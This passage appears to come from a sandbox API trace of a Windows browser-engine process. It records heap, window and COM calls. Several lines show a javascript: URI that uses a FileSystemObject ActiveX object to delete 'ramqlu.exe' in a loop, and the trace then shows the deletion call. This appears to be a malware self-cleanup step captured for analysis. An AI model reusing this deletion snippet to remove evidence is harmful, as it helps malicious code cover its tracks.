Ptr=0x44a798, Size=0x22) returned 0x44a798 [0076.811] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.811] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43c680 | out: hHeap=0x410000) returned 1 [0076.811] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47a5e8 | out: hHeap=0x410000) returned 1 [0076.811] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4530f8 | out: hHeap=0x410000) returned 1 [0076.811] GetCurrentThreadId () returned 0x90 [0076.812] IUnknown:Release (This=0x455488) returned 0x0 [0076.812] IInternetProtocol:UnlockRequest (This=0x45435c) returned 0x0 [0076.812] IUnknown:Release (This=0x454348) returned 0x0 [0076.812] GetProcessHeap () returned 0x410000 [0076.812] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4613a0 | out: hHeap=0x410000) returned 1 [0076.812] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46fd48 | out: hHeap=0x410000) returned 1 [0076.812] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454bf0 | out: hHeap=0x410000) returned 1 [0076.812] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454348 | out: hHeap=0x410000) returned 1 [0076.812] RevokeBindStatusCallback (pBC=0x4503c0, 
pBSCb=0x453428) returned 0x0 [0076.812] IUnknown:Release (This=0x45342c) returned 0x4 [0076.812] IUnknown:Release (This=0x453428) returned 0x3 [0076.812] IUnknown:Release (This=0x4503c0) returned 0x0 [0076.812] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4515b0 | out: hHeap=0x410000) returned 1 [0076.813] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x445b28 | out: hHeap=0x410000) returned 1 [0076.813] IUnknown:Release (This=0x43c254) returned 0xa [0076.813] IUnknown:Release (This=0x43c254) returned 0x9 [0076.813] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.813] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.813] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4790c0 | out: hHeap=0x410000) returned 1 [0076.813] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454d18 | out: hHeap=0x410000) returned 1 [0076.813] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.813] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.813] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.813] IUnknown:Release (This=0x43c254) returned 0x8 [0076.813] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.813] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.814] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.814] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.814] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.814] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.814] IUnknown:Release (This=0x43c254) returned 0x7 [0076.814] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: 
hHeap=0x410000) returned 1 [0076.814] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.814] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4770a8 | out: hHeap=0x410000) returned 1 [0076.814] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44f578 | out: hHeap=0x410000) returned 1 [0076.814] IUnknown:Release (This=0x43c254) returned 0x6 [0076.814] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.814] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.814] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.814] IUnknown:Release (This=0x43c254) returned 0x5 [0076.814] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46fda8 | out: hHeap=0x410000) returned 1 [0076.814] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x453418 | out: hHeap=0x410000) returned 1 [0076.814] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x453160 | out: hHeap=0x410000) returned 1 [0076.815] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47a0d0 | out: hHeap=0x410000) returned 1 [0076.815] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46fdc8 | out: hHeap=0x410000) returned 1 [0076.815] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x453298 | out: hHeap=0x410000) returned 1 [0076.815] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.815] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.815] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.815] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.815] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43f968 | out: hHeap=0x410000) returned 1 [0076.815] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.815] HeapFree (in: hHeap=0x410000, 
dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.815] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x453308 | out: hHeap=0x410000) returned 1 [0076.815] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44f520 | out: hHeap=0x410000) returned 1 [0076.815] GetCurrentThreadId () returned 0x90 [0076.815] GetCurrentThreadId () returned 0x90 [0076.815] GetCurrentThreadId () returned 0x90 [0076.815] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf7a0 | out: lpPoint=0x2cf7a0) returned 1 [0076.816] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x42d958 [0076.816] GetCurrentThreadId () returned 0x90 [0076.816] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d958 | out: hHeap=0x410000) returned 1 [0076.816] GetCurrentThreadId () returned 0x90 [0076.816] GetCurrentThreadId () returned 0x90 [0076.816] GetFocus () returned 0x202a8 [0076.816] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x43f968 [0076.816] NotifyWinEvent (event=0x8005, hwnd=0x202a8, idObject=1, idChild=0) [0076.816] GetCurrentThreadId () returned 0x90 [0076.817] LoadStringW (in: hInstance=0x73710000, uID=0x1fe9, lpBuffer=0x2cf4d8, cchBufferMax=512 | out: lpBuffer="Done") returned 0x4 [0076.817] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457b50 | out: hHeap=0x410000) returned 1 [0076.817] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47a2e8 | out: hHeap=0x410000) returned 1 [0076.817] IUnknown:AddRef (This=0x43bfcc) returned 0x4 [0076.817] IUri:GetScheme (in: This=0x43bfcc, pdwScheme=0x2ce964 | out: pdwScheme=0x2ce964*=0xf) returned 0x0 [0076.817] IUri:GetDisplayUri (in: This=0x43bfcc, pbstrDisplayString=0x2ce970 | out: pbstrDisplayString=0x2ce970*="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);") returned 0x0 [0076.817] GetWindowTextW (in: hWnd=0x3017c, lpString=0x2ce510, nMaxCount=512 | out: lpString="") returned 0 [0076.817] 
NtdllDefWindowProc_W () returned 0x0 [0076.817] SetWindowTextW (hWnd=0x3017c, lpString="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);") returned 1 [0076.817] NtdllDefWindowProc_W () returned 0x1 [0076.818] IUnknown:Release (This=0x43bfcc) returned 0x3 [0076.818] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0076.818] SendMessageW (hWnd=0x4015e, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0 [0076.818] NtdllDefWindowProc_W () returned 0x0 [0076.819] NtdllDefWindowProc_W () returned 0x0 [0076.819] NtdllDefWindowProc_W () returned 0x0 [0076.819] SendMessageW (hWnd=0x3017c, Msg=0x80, wParam=0x0, lParam=0x10027) returned 0x0 [0076.820] NtdllDefWindowProc_W () returned 0x0 [0076.820] SetWindowLongW (hWnd=0x3017c, nIndex=-16, dwNewLong=-2100363264) returned -2033254400 [0076.820] NtdllDefWindowProc_W () returned 0x0 [0076.820] NtdllDefWindowProc_W () returned 0x0 [0076.836] NtdllDefWindowProc_W () returned 0x10027 [0076.837] SetWindowLongW (hWnd=0x3017c, nIndex=-20, dwNewLong=262144) returned 262400 [0076.837] NtdllDefWindowProc_W () returned 0x0 [0076.837] NtdllDefWindowProc_W () returned 0x0 [0076.837] SetWindowPos (hWnd=0x3017c, hWndInsertAfter=0xfffffffe, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0076.837] NtdllDefWindowProc_W () returned 0x0 [0076.837] NtdllDefWindowProc_W () returned 0x0 [0076.838] NtdllDefWindowProc_W () returned 0x0 [0076.839] GlobalAddAtomW (lpString=0x0) returned 0x0 [0076.839] SetPropW (hWnd=0x4015e, lpString=0x0, hData=0x4015e) returned 0 [0076.839] ShowWindow (hWnd=0x3017c, nCmdShow=0) returned 0 [0076.839] UpdateWindow (hWnd=0x3017c) returned 1 [0076.839] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.839] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.839] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) 
returned 1 [0076.839] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.839] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.839] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.839] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.839] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.839] GetCurrentThreadId () returned 0x90 [0076.839] GetCurrentThreadId () returned 0x90 [0076.839] GetCurrentThreadId () returned 0x90 [0076.840] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf248 | out: lpPoint=0x2cf248) returned 1 [0076.840] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x42d958 [0076.840] GetCurrentThreadId () returned 0x90 [0076.840] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d958 | out: hHeap=0x410000) returned 1 [0076.840] GetCurrentThreadId () returned 0x90 [0076.840] GetFocus () returned 0x202a8 [0076.841] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x50) returned 0x44f520 [0076.841] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.841] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf278 | out: lpPoint=0x2cf278) returned 1 [0076.841] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x42d958 [0076.841] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d958 | out: hHeap=0x410000) returned 1 [0076.841] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf260 | out: lpPoint=0x2cf260) returned 1 [0076.842] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x42d958 [0076.842] GetCurrentThreadId () returned 0x90 [0076.842] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d958 | out: hHeap=0x410000) returned 1 [0076.842] GetCurrentThreadId () returned 0x90 [0076.842] IsWinEventHookInstalled (event=0x8005) returned 0 [0076.842] 
StrCmpICW (pszStr1="about:blank", pszStr2="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);") returned -9 [0076.842] StrCmpICW (pszStr1="about:blank", pszStr2="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);") returned -9 [0076.842] GetCurrentThreadId () returned 0x90 [0076.842] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf760 | out: lpPoint=0x2cf760) returned 1 [0076.843] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x42d958 [0076.843] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d958 | out: hHeap=0x410000) returned 1 [0076.843] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf740 | out: lpPoint=0x2cf740) returned 1 [0076.843] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x42d958 [0076.843] GetCurrentThreadId () returned 0x90 [0076.843] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d958 | out: hHeap=0x410000) returned 1 [0076.844] GetCurrentThreadId () returned 0x90 [0076.844] IsWinEventHookInstalled (event=0x8005) returned 0 [0076.844] GetCurrentThreadId () returned 0x90 [0076.844] GetMessageW (in: lpMsg=0x2cfa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2cfa74) returned 1 [0076.844] NtdllDefWindowProc_W () returned 0x1 [0076.848] NtdllDefWindowProc_W () returned 0x0 [0076.848] NtdllDefWindowProc_W () returned 0x0 [0076.848] NtdllDefWindowProc_W () returned 0x0 [0076.848] GetWindowLongW (hWnd=0x202a8, nIndex=-21) returned 4468680 [0076.848] GetParent (hWnd=0x202a8) returned 0x3017c [0076.848] GetParent (hWnd=0x3017c) returned 0x4015e [0076.848] GetParent (hWnd=0x4015e) returned 0x0 [0076.848] PostMessageW (hWnd=0x202a8, Msg=0x491, wParam=0x0, lParam=0x0) returned 1 [0076.848] GetMessageTime () returned 124769 [0076.848] GetMessagePos () returned 0x35603df [0076.848] ScreenToClient (in: hWnd=0x202a8, 
lpPoint=0x2cf4f8 | out: lpPoint=0x2cf4f8) returned 1 [0076.849] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf4f8 | out: lpPoint=0x2cf4f8) returned 1 [0076.849] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x42d958 [0076.849] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x28) returned 0x4535e8 [0076.849] GetCurrentThreadId () returned 0x90 [0076.849] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d958 | out: hHeap=0x410000) returned 1 [0076.850] GetCurrentThreadId () returned 0x90 [0076.850] GetCurrentThreadId () returned 0x90 [0076.850] PostMessageW (hWnd=0x202ae, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0076.850] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4535e8 | out: hHeap=0x410000) returned 1 [0076.850] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x445c90, hWnd=0x202a8, msg=0x8, wParam=0x0, lParam=0x0, plResult=0x2cf734 | out: plResult=0x2cf734) returned 0x1 [0076.850] NtdllDefWindowProc_W () returned 0x0 [0076.850] GetCurrentThreadId () returned 0x90 [0076.850] GetWindowLongW (hWnd=0x202a8, nIndex=-21) returned 4468680 [0076.851] GetMessageTime () returned 124769 [0076.851] GetMessagePos () returned 0x35603df [0076.866] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x445c90, hWnd=0x202a8, msg=0x281, wParam=0x0, lParam=0xc000000f, plResult=0x2cf344 | out: plResult=0x2cf344) returned 0x0 [0076.867] GetWindowLongW (hWnd=0x202a8, nIndex=-21) returned 4468680 [0076.867] GetMessageTime () returned 124769 [0076.867] GetMessagePos () returned 0x35603df [0076.868] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf8) returned 0x47a2e8 [0076.869] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x445c90, hWnd=0x202a8, msg=0x282, wParam=0x1, lParam=0x0, plResult=0x2ced74 | out: plResult=0x2ced74) returned 0x0 [0076.869] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47a2e8 | out: hHeap=0x410000) returned 1 [0076.869] GetCurrentThreadId () returned 0x90 
[0076.869] GetCurrentThreadId () returned 0x90 [0076.869] TranslateMessage (lpMsg=0x2cfa74) returned 0 [0076.869] DispatchMessageW (lpMsg=0x2cfa74) returned 0x0 [0076.869] GetWindowLongW (hWnd=0x202a8, nIndex=-21) returned 4468680 [0076.869] GetAncestor (hwnd=0x202a8, gaFlags=0x2) returned 0x3017c [0076.869] IsIconic (hWnd=0x3017c) returned 0 [0076.869] GetCurrentThreadId () returned 0x90 [0076.869] GetMessageW (in: lpMsg=0x2cfa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2cfa74) returned 1 [0076.869] TranslateMessage (lpMsg=0x2cfa74) returned 0 [0076.869] DispatchMessageW (lpMsg=0x2cfa74) returned 0x0 [0076.870] GetFocus () returned 0x0 [0076.870] EnumChildWindows (hWndParent=0x202a8, lpEnumFunc=0x74e10a73, lParam=0x2cf764) returned 0 [0076.870] GetCurrentThreadId () returned 0x90 [0076.870] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf760 | out: lpPoint=0x2cf760) returned 1 [0076.870] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x42d958 [0076.871] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d958 | out: hHeap=0x410000) returned 1 [0076.871] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf740 | out: lpPoint=0x2cf740) returned 1 [0076.871] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x42d958 [0076.871] GetCurrentThreadId () returned 0x90 [0076.871] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d958 | out: hHeap=0x410000) returned 1 [0076.871] GetCurrentThreadId () returned 0x90 [0076.871] IsWinEventHookInstalled (event=0x8005) returned 0 [0076.871] GetCurrentThreadId () returned 0x90 [0076.871] GetMessageW (in: lpMsg=0x2cfa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2cfa74) returned 1 [0076.872] TranslateMessage (lpMsg=0x2cfa74) returned 0 [0076.872] DispatchMessageW (lpMsg=0x2cfa74) returned 0x0 [0076.872] GetWindowLongW (hWnd=0x202a8, nIndex=-21) returned 4468680 [0076.872] KillTimer (hWnd=0x202a8, uIDEvent=0x1000) returned 1 [0076.872] GetCurrentThreadId 
() returned 0x90 [0076.872] GetMessageW (in: lpMsg=0x2cfa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2cfa74) returned 1 [0076.872] TranslateMessage (lpMsg=0x2cfa74) returned 0 [0076.872] DispatchMessageW (lpMsg=0x2cfa74) returned 0x0 [0076.872] KillTimer (hWnd=0x202ae, uIDEvent=0x2000) returned 1 [0076.872] ISystemDebugEventFire:IsActive (This=0x45f140) returned 0x1 [0076.872] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cf628 | out: ppv=0x2cf628*=0x436988) returned 0x0 [0076.873] IUnknown:Release (This=0x436988) returned 0x1 [0076.873] GetCurrentThreadId () returned 0x90 [0076.873] GetCurrentThreadId () returned 0x90 [0076.873] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2a52fc0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x2cf2a4*="DeleteFile", cNames=0x1, lcid=0x409, rgDispId=0x2cf2c8 | out: rgDispId=0x2cf2c8*=1200) returned 0x0 [0076.874] FileSystemObject:IUnknown:AddRef (This=0x2a52fc0) returned 0x2 [0076.874] FileSystemObject:IDispatch:Invoke (in: This=0x2a52fc0, dispIdMember=1200, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x2cf26c*(rgvarg=([0]=0x2cf210*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ramqlu.exe", varVal2=0x5813d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x2cf4a0, pExcepInfo=0x2cf280, puArgErr=0x2cf27c | out: pDispParams=0x2cf26c*(rgvarg=([0]=0x2cf210*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ramqlu.exe", varVal2=0x5813d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x2cf4a0*(varType=0x0, wReserved1=0x0, wReserved2=0xf500, wReserved3=0x2c, varVal1=0x0, varVal2=0x0), 
pExcepInfo=0x2cf280*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x2cf27c*=0x2a52fc0) returned 0x0 [0077.152] FileSystemObject:IUnknown:Release (This=0x2a52fc0) returned 0x1 [0077.152] GetCurrentThreadId () returned 0x90 [0077.152] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0077.153] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0077.153] ??2@YAPAXI@Z () returned 0x2a511b0 [0077.153] GetCurrentThreadId () returned 0x90 [0077.153] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0077.153] PostMessageW (hWnd=0x3017c, Msg=0x10, wParam=0x0, lParam=0x0) returned 1 [0077.153] GetCurrentThreadId () returned 0x90 [0077.153] GetCurrentThreadId () returned 0x90 [0077.154] ISystemDebugEventFire:IsActive (This=0x45f140) returned 0x1 [0077.154] ??3@YAXPAX@Z () returned 0x1 [0077.154] GetCurrentThreadId () returned 0x90 [0077.154] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x43f9f8 [0077.154] SetTimer (hWnd=0x202ae, nIDEvent=0x2001, uElapse=0xa, lpTimerFunc=0x0) returned 0x2001 [0077.154] GetMessageW (in: lpMsg=0x2cfa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2cfa74) returned 1 [0077.154] TranslateMessage (lpMsg=0x2cfa74) returned 0 [0077.154] DispatchMessageW (lpMsg=0x2cfa74) returned 0x0 [0077.154] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf370 | out: lpPoint=0x2cf370) returned 1 [0077.155] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x42d958 [0077.155] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d958 | out: hHeap=0x410000) returned 1 [0077.155] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf200 | out: lpPoint=0x2cf200) returned 1 [0077.155] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x42d958 [0077.155] GetCurrentThreadId () returned 0x90 [0077.155] HeapFree (in: 
hHeap=0x410000, dwFlags=0x0, lpMem=0x42d958 | out: hHeap=0x410000) returned 1 [0077.156] GetCurrentThreadId () returned 0x90 [0077.156] GetCurrentThreadId () returned 0x90 [0077.156] DestroyWindow (hWnd=0x3017c) returned 1 [0077.156] NtdllDefWindowProc_W () returned 0x0 [0077.156] PostQuitMessage (nExitCode=0) [0077.156] GetWindowLongW (hWnd=0x202a8, nIndex=-21) returned 4468680 [0077.156] RevokeDragDrop (hwnd=0x202a8) returned 0x0 [0077.157] GetCurrentThreadId () returned 0x90 [0077.157] GetWindowLongW (hWnd=0x202a8, nIndex=-21) returned 4468680 [0077.157] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x445c90, hWnd=0x202a8, msg=0x82, wParam=0x0, lParam=0x0, plResult=0x2cf788 | out: plResult=0x2cf788) returned 0x1 [0077.157] NtdllDefWindowProc_W () returned 0x0 [0077.157] GetCurrentThreadId () returned 0x90 [0077.157] SetWindowLongW (hWnd=0x202a8, nIndex=-21, dwNewLong=0) returned 4468680 [0077.157] NtdllDefWindowProc_W () returned 0x0 [0077.157] GetMessageW (in: lpMsg=0x2cfa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2cfa74) returned 0 [0077.158] PostMessageW (hWnd=0x202ae, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0077.158] GetCurrentThreadId () returned 0x90 [0077.158] KillTimer (hWnd=0x202ae, uIDEvent=0x2001) returned 1 [0077.158] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46fd08 | out: hHeap=0x410000) returned 1 [0077.158] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43f9f8 | out: hHeap=0x410000) returned 1 [0077.158] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.158] ScreenToClient (in: hWnd=0x0, lpPoint=0x2cf820 | out: lpPoint=0x2cf820) returned 0 [0077.158] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x42d958 [0077.159] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d958 | out: hHeap=0x410000) returned 1 [0077.159] ScreenToClient (in: hWnd=0x0, lpPoint=0x2cf808 | out: lpPoint=0x2cf808) returned 0 [0077.159] 
RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x42d958 [0077.159] GetCurrentThreadId () returned 0x90 [0077.159] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d958 | out: hHeap=0x410000) returned 1 [0077.159] GetCurrentThreadId () returned 0x90 [0077.159] IsWinEventHookInstalled (event=0x8005) returned 0 [0077.159] GetCurrentThreadId () returned 0x90 [0077.159] CActiveIMMAppEx_Trident:IActiveIMMApp:Deactivate (This=0x445c90) returned 0x0 [0077.159] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x421a38 | out: hHeap=0x410000) returned 1 [0077.159] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47a5a0 | out: hHeap=0x410000) returned 1 [0077.159] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42daa8 | out: hHeap=0x410000) returned 1 [0077.159] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4516d0 | out: hHeap=0x410000) returned 1 [0077.159] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.159] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.160] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.160] IntersectRect (in: lprcDst=0x2cf888, lprcSrc1=0x2cf888, lprcSrc2=0x2cf910 | out: lprcDst=0x2cf888) returned 1 [0077.160] IntersectRect (in: lprcDst=0x2cf920, lprcSrc1=0x2cf920, lprcSrc2=0x2cf888 | out: lprcDst=0x2cf920) returned 1 [0077.160] IntersectRect (in: lprcDst=0x2cf978, lprcSrc1=0x2cf978, lprcSrc2=0x2cf910 | out: lprcDst=0x2cf978) returned 1 [0077.160] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.160] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.160] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | 